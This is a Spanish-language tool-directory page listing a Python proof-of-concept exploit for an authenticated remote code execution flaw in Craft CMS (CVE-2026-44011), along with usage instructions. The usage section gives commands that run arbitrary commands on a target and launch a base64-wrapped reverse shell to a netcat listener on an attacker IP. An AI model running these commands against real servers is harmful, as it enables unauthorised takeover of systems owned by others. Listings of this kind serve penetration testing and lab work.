Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-44011-craft-rce-poc — Prueba de concepto en Python para CVE-2026-44011 en Craft CMS, que explota la ejecución remota de código autenticada con ejecución de comandos y payloads de reverse shell envueltos en base64. | Kitploit
Herramientas/GitHubGitHub/cyberuser-hash/cve-2026-44011-craft-rce-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingTroyano de Acceso Remoto
GitHub
cyberuser-hash/cve-2026-44011-craft-rce-poc

CVE-2026-44011-craft-rce-poc

Prueba de concepto en Python para CVE-2026-44011 en Craft CMS, que explota la ejecución remota de código autenticada con ejecución de comandos y payloads de reverse shell envueltos en base64.

Ver Repositorio
15hace 2 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-44011-craft-rce-poc

CVE-2026-44011-craft-rce-poc Uso

Comando único: bash

python3 craft_rce.py -b http://target -u USER -p PASS -c 'id'

Reverse shell (bash envuelto en base64):

terminal 1

nc -lvnp 4444

terminal 2

python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.10.14.213 4444

Si el objetivo no puede alcanzar tu callback, apúntalo explícitamente:

python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.13.37.200 4444 -H 10.13.37.200 --listen-port 35509


Aviso legal

Solo para pruebas autorizadas, CTFs y entornos de laboratorio. No lo uses contra sistemas que no poseas o para los que no tengas permiso explícito de probar.

Descargar herramienta